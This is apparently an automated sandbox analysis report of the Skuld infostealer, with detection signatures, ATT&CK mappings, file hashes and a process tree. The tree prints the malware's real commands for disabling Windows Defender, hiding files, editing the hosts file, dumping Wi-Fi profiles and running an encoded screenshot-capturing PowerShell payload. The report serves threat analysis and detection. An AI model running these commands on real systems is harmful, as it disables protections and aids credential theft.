Overview

overview

10

Static

static

3

skuld-main.exe

windows7-x64

10

skuld-main.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    150s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-07-2024 09:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    skuld-main.exe

  • Size

    3.9MB

  • MD5

    aa6ab61ffec1cadb1f1fb9e409434d23

  • SHA1

    36d9bcca5162c35b0d12955c22bd913a91f20d61

  • SHA256

    fd27388ee0e064cc6c28557ced21dd581e98938449e1fa90e77de6961665f8db

  • SHA512

    f0017002feb946a901ac363e60f87ed175926992a4369a1fa1b59ccea1e36d46b5488a76c035566605f4388b015d4e9239c0d968c83b9399efd19e96818d0c52

  • SSDEEP

    98304:tx64YRFYsecOWle37HUjioDRo/Kjaf2kSsTUGqgytme:j2n2xtoDi/KxkSsoGxytD

Score
9/10
credential_accessdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld-main.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld-main.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.sfx.exe
        skuld.sfx.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4292
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Views/modifies file attributes
            PID:4424
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
            5⤵
            • Views/modifies file attributes
            PID:3596
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            5⤵
            • Detects videocard installed
            • Suspicious use of AdjustPrivilegeToken
            PID:3048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2280
          • C:\Windows\System32\Wbem\wmic.exe
            wmic os get Caption
            5⤵
              PID:3952
            • C:\Windows\System32\Wbem\wmic.exe
              wmic cpu get Name
              5⤵
                PID:948
              • C:\Windows\System32\Wbem\wmic.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:1824
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:388
              • C:\Windows\System32\Wbem\wmic.exe
                wmic csproduct get UUID
                5⤵
                  PID:1236
                • C:\Windows\system32\attrib.exe
                  attrib -r C:\Windows\System32\drivers\etc\hosts
                  5⤵
                  • Drops file in Drivers directory
                  • Views/modifies file attributes
                  PID:4600
                • C:\Windows\system32\attrib.exe
                  attrib +r C:\Windows\System32\drivers\etc\hosts
                  5⤵
                  • Drops file in Drivers directory
                  • Views/modifies file attributes
                  PID:3608
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:5044
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1740
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2528
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp" "c:\Users\Admin\AppData\Local\Temp\il5gzbhx\CSCD238C4656F24D5688C2A38E1C9280B9.TMP"
                      7⤵
                        PID:4792

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Event Triggered Execution

          1
          T1546

          Netsh Helper DLL

          1
          T1546.007

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Event Triggered Execution

          1
          T1546

          Netsh Helper DLL

          1
          T1546.007

          Defense Evasion

          Hide Artifacts

          1
          T1564

          Hidden Files and Directories

          1
          T1564.001

          Modify Registry

          2
          T1112

          Obfuscated Files or Information

          1
          T1027

          Command Obfuscation

          1
          T1027.010

          Subvert Trust Controls

          1
          T1553

          Install Root Certificate

          1
          T1553.004

          Credential Access

          Credentials from Password Stores

          1
          T1555

          Credentials from Web Browsers

          1
          T1555.003

          Unsecured Credentials

          4
          T1552

          Credentials In Files

          4
          T1552.001

          Discovery

          Browser Information Discovery

          1
          T1217

          Peripheral Device Discovery

          1
          T1120

          Query Registry

          2
          T1012

          System Information Discovery

          4
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          System Network Configuration Discovery

          1
          T1016

          Wi-Fi Discovery

          1
          T1016.002

          Lateral Movement

          Collection

          Data from Local System

          3
          T1005

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d3e9c29fe44e90aae6ed30ccf799ca8

            SHA1

            c7974ef72264bbdf13a2793ccf1aed11bc565dce

            SHA256

            2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

            SHA512

            60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            15dde0683cd1ca19785d7262f554ba93

            SHA1

            d039c577e438546d10ac64837b05da480d06bf69

            SHA256

            d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

            SHA512

            57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp
            Filesize

            1KB

            MD5

            a1e8e76c8979f3a71518e1f7c040bd6e

            SHA1

            686c19cd1f66d7b6a4ba0558242e8239a5e60c25

            SHA256

            7af460dd0655443f81a9cbe612f65bfef8cb75500bd9fb0efccf0f57ed7bf0df

            SHA512

            b10e6ccbf81002d2c4ee22885b08320071e5fa9149cba826f3420c8568001d0fd1bb591a5b7110da9cb998a4f1dc78be8257e880c7edd1f0bc8db4b6fd5be363

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper.bat
            Filesize

            19B

            MD5

            d26173d979a9427cb2d59478382db58b

            SHA1

            6a4834c27726aebad506434465485dbf594b92c2

            SHA256

            78b08486655044ecdbb7d710b895830469ba8ca48ee4bc32b721e83f0f4f2905

            SHA512

            04f3ddab7158e5faa4eefc84fc90ca7669d34fbd6770f4debb03bc582267000599a24f619b383efa719cc7bf64e2a845316167389ea3b92471dda659202621c5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            Filesize

            9.5MB

            MD5

            8b072fa6dc2293e8fc4c79a4c9186886

            SHA1

            dc62f8da50e79c32042523062bfaa12f3179c796

            SHA256

            72614853b5345d3672df3e26a1ad39df61c87d882e40503651a9f237472c018d

            SHA512

            77346cbde03e6b1c60c776f5365ed24c784291b3b89ca21d1f0ccdc7c0a7e24e6a0816373d95ccea9f172e30a674726ea7fae48cd35c7c2dd4ca1a909a9e1636

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.sfx.exe
            Filesize

            3.7MB

            MD5

            c22852523a7ecfc152e31ab535e02fd2

            SHA1

            bfd7e15bb7a0ab28b7a6b21124bc963dc09ecbb8

            SHA256

            a94ea7310ba474d5e22faf966dc930915b18d2d54178f2ae31af20156ea9360a

            SHA512

            eaceef152e9fdcea1a2b04ad0bc828dd72ea90b703466c65baf5ba04391c628acd5509c79801019fc779105b0ae27c62f84b5a259e20ad8bcaf014bce519e246

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Z0vTmiVWyX\Display (1).png
            Filesize

            423KB

            MD5

            b2578958fcb784942dedb3e4798b8cd6

            SHA1

            e1f81dcbf299ffd09c753410cf4f1663ca7a33b4

            SHA256

            d9278db857df44c21b562d2aa3538bd322da41601c449418c412af139c5e13c6

            SHA512

            c8a0b9bd2e5d8f189598758a45fca4e90996102ea035a4b51247751e3e730b471e11b0a1ec809aff0c1ea749acd9ef46a99174bc0a55cc1606dd452827c5af44

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkxn0nwc.mld.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.dll
            Filesize

            4KB

            MD5

            3167df3d4dcf9c2dd82696ec2a15de62

            SHA1

            4b3015bd6d76a7f21c9d48b8cccd1c56b79d0dd6

            SHA256

            cfa2842a07dbca9617dfe636be898a66a6fe3717a9db6394ce9ce278891b7c09

            SHA512

            babfd3cd8e0c2e5f194a1314d3732039228d3b6df127a1ecef710570c39ec6676f033bad1eb2b2bf798404839b7703c6ee9759b42d8ef14739224d7480e9a4dc

            Download Submit

          • C:\Windows\System32\drivers\etc\hosts
            Filesize

            2KB

            MD5

            6e2386469072b80f18d5722d07afdc0b

            SHA1

            032d13e364833d7276fcab8a5b2759e79182880f

            SHA256

            ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

            SHA512

            e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\CSCD238C4656F24D5688C2A38E1C9280B9.TMP
            Filesize

            652B

            MD5

            0c60e3bb5fc4b7df4a75d4423edf3d91

            SHA1

            c9f464f39e1b2ec98298ceab0e145f36807f0496

            SHA256

            57e21339ee8fa9e8d6a41d6b7891c2ac6d9ee76f5e9fa0aa98f0cf116b3faa47

            SHA512

            216d43c329b6111d198d310fd50d558efc746707175fe63234f7875243fdcd3eab279c3f35619ffc67717bde628302c8231fe4638351a30a5765f112b7f9abdd

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.0.cs
            Filesize

            1004B

            MD5

            c76055a0388b713a1eabe16130684dc3

            SHA1

            ee11e84cf41d8a43340f7102e17660072906c402

            SHA256

            8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

            SHA512

            22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.cmdline
            Filesize

            607B

            MD5

            e92a6272867a9ddf5ce2bc519395d829

            SHA1

            45a1ae484b31ebd34435896032f3b187723e3612

            SHA256

            636b2411a7965343160ace04ce0d61d7ab23e22efc7977d758298624fb06879d

            SHA512

            07f9a58c6700b591bba98fe4df363365504f9ed2939df0c65084e8ad81b8721a088d906d73d598f0ff8f55626d01c3fd7478e2e36735265e04d895e3fa3d8f24

            Download Submit

          • memory/1740-80-0x000001EEB0710000-0x000001EEB0718000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2280-22-0x0000027BD8DC0000-0x0000027BD8DE2000-memory.dmp

            Filesize

            136KB

            Download